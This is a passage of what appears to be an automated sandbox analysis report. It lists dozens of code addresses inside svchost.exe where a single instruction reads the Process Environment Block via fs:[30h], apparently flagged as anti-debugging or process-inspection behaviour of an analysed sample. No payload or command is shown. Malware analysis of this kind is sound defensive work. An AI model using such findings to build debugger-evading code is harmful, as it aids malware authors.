Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]	2_2_03240770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]	2_2_03240770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]	2_2_03240770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]	2_2_03240770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]	2_2_03240770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326674D mov esi, dword ptr fs:[00000030h]	2_2_0326674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326674D mov eax, dword ptr fs:[00000030h]	2_2_0326674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326674D mov eax, dword ptr fs:[00000030h]	2_2_0326674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03230750 mov eax, dword ptr fs:[00000030h]	2_2_03230750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032BE75D mov eax, dword ptr fs:[00000030h]	2_2_032BE75D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272750 mov eax, dword ptr fs:[00000030h]	2_2_03272750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272750 mov eax, dword ptr fs:[00000030h]	2_2_03272750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B4755 mov eax, dword ptr fs:[00000030h]	2_2_032B4755
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032307AF mov eax, dword ptr fs:[00000030h]	2_2_032307AF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032E47A0 mov eax, dword ptr fs:[00000030h]	2_2_032E47A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032D678E mov eax, dword ptr fs:[00000030h]	2_2_032D678E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032527ED mov eax, dword ptr fs:[00000030h]	2_2_032527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032527ED mov eax, dword ptr fs:[00000030h]	2_2_032527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032527ED mov eax, dword ptr fs:[00000030h]	2_2_032527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032BE7E1 mov eax, dword ptr fs:[00000030h]	2_2_032BE7E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032347FB mov eax, dword ptr fs:[00000030h]	2_2_032347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032347FB mov eax, dword ptr fs:[00000030h]	2_2_032347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323C7C0 mov eax, dword ptr fs:[00000030h]	2_2_0323C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B07C3 mov eax, dword ptr fs:[00000030h]	2_2_032B07C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324E627 mov eax, dword ptr fs:[00000030h]	2_2_0324E627
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03266620 mov eax, dword ptr fs:[00000030h]	2_2_03266620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03268620 mov eax, dword ptr fs:[00000030h]	2_2_03268620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323262C mov eax, dword ptr fs:[00000030h]	2_2_0323262C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AE609 mov eax, dword ptr fs:[00000030h]	2_2_032AE609
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324260B mov eax, dword ptr fs:[00000030h]	2_2_0324260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324260B mov eax, dword ptr fs:[00000030h]	2_2_0324260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324260B mov eax, dword ptr fs:[00000030h]	2_2_0324260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324260B mov eax, dword ptr fs:[00000030h]	2_2_0324260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324260B mov eax, dword ptr fs:[00000030h]	2_2_0324260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324260B mov eax, dword ptr fs:[00000030h]	2_2_0324260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324260B mov eax, dword ptr fs:[00000030h]	2_2_0324260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272619 mov eax, dword ptr fs:[00000030h]	2_2_03272619
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032F866E mov eax, dword ptr fs:[00000030h]	2_2_032F866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032F866E mov eax, dword ptr fs:[00000030h]	2_2_032F866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326A660 mov eax, dword ptr fs:[00000030h]	2_2_0326A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326A660 mov eax, dword ptr fs:[00000030h]	2_2_0326A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03262674 mov eax, dword ptr fs:[00000030h]	2_2_03262674
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324C640 mov eax, dword ptr fs:[00000030h]	2_2_0324C640
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326C6A6 mov eax, dword ptr fs:[00000030h]	2_2_0326C6A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032666B0 mov eax, dword ptr fs:[00000030h]	2_2_032666B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03234690 mov eax, dword ptr fs:[00000030h]	2_2_03234690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03234690 mov eax, dword ptr fs:[00000030h]	2_2_03234690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_032AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_032AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_032AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_032AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B06F1 mov eax, dword ptr fs:[00000030h]	2_2_032B06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B06F1 mov eax, dword ptr fs:[00000030h]	2_2_032B06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326A6C7 mov ebx, dword ptr fs:[00000030h]	2_2_0326A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326A6C7 mov eax, dword ptr fs:[00000030h]	2_2_0326A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240535 mov eax, dword ptr fs:[00000030h]	2_2_03240535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240535 mov eax, dword ptr fs:[00000030h]	2_2_03240535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240535 mov eax, dword ptr fs:[00000030h]	2_2_03240535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240535 mov eax, dword ptr fs:[00000030h]	2_2_03240535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240535 mov eax, dword ptr fs:[00000030h]	2_2_03240535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240535 mov eax, dword ptr fs:[00000030h]	2_2_03240535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325E53E mov eax, dword ptr fs:[00000030h]	2_2_0325E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325E53E mov eax, dword ptr fs:[00000030h]	2_2_0325E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325E53E mov eax, dword ptr fs:[00000030h]	2_2_0325E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325E53E mov eax, dword ptr fs:[00000030h]	2_2_0325E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325E53E mov eax, dword ptr fs:[00000030h]	2_2_0325E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C6500 mov eax, dword ptr fs:[00000030h]	2_2_032C6500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03304500 mov eax, dword ptr fs:[00000030h]	2_2_03304500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03304500 mov eax, dword ptr fs:[00000030h]	2_2_03304500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03304500 mov eax, dword ptr fs:[00000030h]	2_2_03304500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03304500 mov eax, dword ptr fs:[00000030h]	2_2_03304500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03304500 mov eax, dword ptr fs:[00000030h]	2_2_03304500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03304500 mov eax, dword ptr fs:[00000030h]	2_2_03304500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03304500 mov eax, dword ptr fs:[00000030h]	2_2_03304500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326656A mov eax, dword ptr fs:[00000030h]	2_2_0326656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326656A mov eax, dword ptr fs:[00000030h]	2_2_0326656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326656A mov eax, dword ptr fs:[00000030h]	2_2_0326656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03238550 mov eax, dword ptr fs:[00000030h]	2_2_03238550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03238550 mov eax, dword ptr fs:[00000030h]	2_2_03238550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B05A7 mov eax, dword ptr fs:[00000030h]	2_2_032B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B05A7 mov eax, dword ptr fs:[00000030h]	2_2_032B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B05A7 mov eax, dword ptr fs:[00000030h]	2_2_032B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032545B1 mov eax, dword ptr fs:[00000030h]	2_2_032545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032545B1 mov eax, dword ptr fs:[00000030h]	2_2_032545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03232582 mov eax, dword ptr fs:[00000030h]	2_2_03232582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03232582 mov ecx, dword ptr fs:[00000030h]	2_2_03232582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03264588 mov eax, dword ptr fs:[00000030h]	2_2_03264588
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326E59C mov eax, dword ptr fs:[00000030h]	2_2_0326E59C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0325E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0325E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0325E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0325E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0325E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0325E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0325E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0325E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032325E0 mov eax, dword ptr fs:[00000030h]	2_2_032325E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326C5ED mov eax, dword ptr fs:[00000030h]	2_2_0326C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326C5ED mov eax, dword ptr fs:[00000030h]	2_2_0326C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326E5CF mov eax, dword ptr fs:[00000030h]	2_2_0326E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326E5CF mov eax, dword ptr fs:[00000030h]	2_2_0326E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032365D0 mov eax, dword ptr fs:[00000030h]	2_2_032365D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326A5D0 mov eax, dword ptr fs:[00000030h]	2_2_0326A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326A5D0 mov eax, dword ptr fs:[00000030h]	2_2_0326A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322E420 mov eax, dword ptr fs:[00000030h]	2_2_0322E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322E420 mov eax, dword ptr fs:[00000030h]	2_2_0322E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322E420 mov eax, dword ptr fs:[00000030h]	2_2_0322E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322C427 mov eax, dword ptr fs:[00000030h]	2_2_0322C427
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B6420 mov eax, dword ptr fs:[00000030h]	2_2_032B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B6420 mov eax, dword ptr fs:[00000030h]	2_2_032B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B6420 mov eax, dword ptr fs:[00000030h]	2_2_032B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B6420 mov eax, dword ptr fs:[00000030h]	2_2_032B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B6420 mov eax, dword ptr fs:[00000030h]	2_2_032B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B6420 mov eax, dword ptr fs:[00000030h]	2_2_032B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B6420 mov eax, dword ptr fs:[00000030h]	2_2_032B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326A430 mov eax, dword ptr fs:[00000030h]	2_2_0326A430
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03268402 mov eax, dword ptr fs:[00000030h]	2_2_03268402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03268402 mov eax, dword ptr fs:[00000030h]	2_2_03268402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03268402 mov eax, dword ptr fs:[00000030h]	2_2_03268402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032BC460 mov ecx, dword ptr fs:[00000030h]	2_2_032BC460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325A470 mov eax, dword ptr fs:[00000030h]	2_2_0325A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325A470 mov eax, dword ptr fs:[00000030h]	2_2_0325A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325A470 mov eax, dword ptr fs:[00000030h]	2_2_0325A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326E443 mov eax, dword ptr fs:[00000030h]	2_2_0326E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326E443 mov eax, dword ptr fs:[00000030h]	2_2_0326E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326E443 mov eax, dword ptr fs:[00000030h]	2_2_0326E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326E443 mov eax, dword ptr fs:[00000030h]	2_2_0326E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326E443 mov eax, dword ptr fs:[00000030h]	2_2_0326E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326E443 mov eax, dword ptr fs:[00000030h]	2_2_0326E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326E443 mov eax, dword ptr fs:[00000030h]	2_2_0326E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326E443 mov eax, dword ptr fs:[00000030h]	2_2_0326E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032EA456 mov eax, dword ptr fs:[00000030h]	2_2_032EA456
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322645D mov eax, dword ptr fs:[00000030h]	2_2_0322645D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325245A mov eax, dword ptr fs:[00000030h]	2_2_0325245A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032364AB mov eax, dword ptr fs:[00000030h]	2_2_032364AB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032644B0 mov ecx, dword ptr fs:[00000030h]	2_2_032644B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032BA4B0 mov eax, dword ptr fs:[00000030h]	2_2_032BA4B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032EA49A mov eax, dword ptr fs:[00000030h]	2_2_032EA49A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032304E5 mov ecx, dword ptr fs:[00000030h]	2_2_032304E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325EB20 mov eax, dword ptr fs:[00000030h]	2_2_0325EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325EB20 mov eax, dword ptr fs:[00000030h]	2_2_0325EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032F8B28 mov eax, dword ptr fs:[00000030h]	2_2_032F8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032F8B28 mov eax, dword ptr fs:[00000030h]	2_2_032F8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h]	2_2_032AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h]	2_2_032AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h]	2_2_032AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h]	2_2_032AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h]	2_2_032AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h]	2_2_032AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h]	2_2_032AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h]	2_2_032AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h]	2_2_032AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322CB7E mov eax, dword ptr fs:[00000030h]	2_2_0322CB7E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032E4B4B mov eax, dword ptr fs:[00000030h]	2_2_032E4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032E4B4B mov eax, dword ptr fs:[00000030h]	2_2_032E4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C6B40 mov eax, dword ptr fs:[00000030h]	2_2_032C6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C6B40 mov eax, dword ptr fs:[00000030h]	2_2_032C6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032D8B42 mov eax, dword ptr fs:[00000030h]	2_2_032D8B42
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032FAB40 mov eax, dword ptr fs:[00000030h]	2_2_032FAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DEB50 mov eax, dword ptr fs:[00000030h]	2_2_032DEB50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240BBE mov eax, dword ptr fs:[00000030h]	2_2_03240BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240BBE mov eax, dword ptr fs:[00000030h]	2_2_03240BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032E4BB0 mov eax, dword ptr fs:[00000030h]	2_2_032E4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032E4BB0 mov eax, dword ptr fs:[00000030h]	2_2_032E4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03238BF0 mov eax, dword ptr fs:[00000030h]	2_2_03238BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03238BF0 mov eax, dword ptr fs:[00000030h]	2_2_03238BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03238BF0 mov eax, dword ptr fs:[00000030h]	2_2_03238BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325EBFC mov eax, dword ptr fs:[00000030h]	2_2_0325EBFC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032BCBF0 mov eax, dword ptr fs:[00000030h]	2_2_032BCBF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03250BCB mov eax, dword ptr fs:[00000030h]	2_2_03250BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03250BCB mov eax, dword ptr fs:[00000030h]	2_2_03250BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03250BCB mov eax, dword ptr fs:[00000030h]	2_2_03250BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03230BCD mov eax, dword ptr fs:[00000030h]	2_2_03230BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03230BCD mov eax, dword ptr fs:[00000030h]	2_2_03230BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03230BCD mov eax, dword ptr fs:[00000030h]	2_2_03230BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DEBD0 mov eax, dword ptr fs:[00000030h]	2_2_032DEBD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326CA24 mov eax, dword ptr fs:[00000030h]	2_2_0326CA24
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325EA2E mov eax, dword ptr fs:[00000030h]	2_2_0325EA2E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03254A35 mov eax, dword ptr fs:[00000030h]	2_2_03254A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03254A35 mov eax, dword ptr fs:[00000030h]	2_2_03254A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326CA38 mov eax, dword ptr fs:[00000030h]	2_2_0326CA38
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032BCA11 mov eax, dword ptr fs:[00000030h]	2_2_032BCA11
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326CA6F mov eax, dword ptr fs:[00000030h]	2_2_0326CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326CA6F mov eax, dword ptr fs:[00000030h]	2_2_0326CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326CA6F mov eax, dword ptr fs:[00000030h]	2_2_0326CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DEA60 mov eax, dword ptr fs:[00000030h]	2_2_032DEA60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032ACA72 mov eax, dword ptr fs:[00000030h]	2_2_032ACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032ACA72 mov eax, dword ptr fs:[00000030h]	2_2_032ACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03236A50 mov eax, dword ptr fs:[00000030h]	2_2_03236A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03236A50 mov eax, dword ptr fs:[00000030h]	2_2_03236A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03236A50 mov eax, dword ptr fs:[00000030h]	2_2_03236A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03236A50 mov eax, dword ptr fs:[00000030h]	2_2_03236A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03236A50 mov eax, dword ptr fs:[00000030h]	2_2_03236A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03236A50 mov eax, dword ptr fs:[00000030h]	2_2_03236A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03236A50 mov eax, dword ptr fs:[00000030h]	2_2_03236A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240A5B mov eax, dword ptr fs:[00000030h]	2_2_03240A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240A5B mov eax, dword ptr fs:[00000030h]	2_2_03240A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03238AA0 mov eax, dword ptr fs:[00000030h]	2_2_03238AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03238AA0 mov eax, dword ptr fs:[00000030h]	2_2_03238AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03286AA4 mov eax, dword ptr fs:[00000030h]	2_2_03286AA4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h]	2_2_0323EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h]	2_2_0323EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h]	2_2_0323EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h]	2_2_0323EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h]	2_2_0323EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h]	2_2_0323EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h]	2_2_0323EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h]	2_2_0323EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h]	2_2_0323EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03304A80 mov eax, dword ptr fs:[00000030h]	2_2_03304A80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03268A90 mov edx, dword ptr fs:[00000030h]	2_2_03268A90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326AAEE mov eax, dword ptr fs:[00000030h]	2_2_0326AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326AAEE mov eax, dword ptr fs:[00000030h]	2_2_0326AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03286ACC mov eax, dword ptr fs:[00000030h]	2_2_03286ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03286ACC mov eax, dword ptr fs:[00000030h]	2_2_03286ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03286ACC mov eax, dword ptr fs:[00000030h]	2_2_03286ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03230AD0 mov eax, dword ptr fs:[00000030h]	2_2_03230AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03264AD0 mov eax, dword ptr fs:[00000030h]	2_2_03264AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03264AD0 mov eax, dword ptr fs:[00000030h]	2_2_03264AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B892A mov eax, dword ptr fs:[00000030h]	2_2_032B892A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C892B mov eax, dword ptr fs:[00000030h]	2_2_032C892B
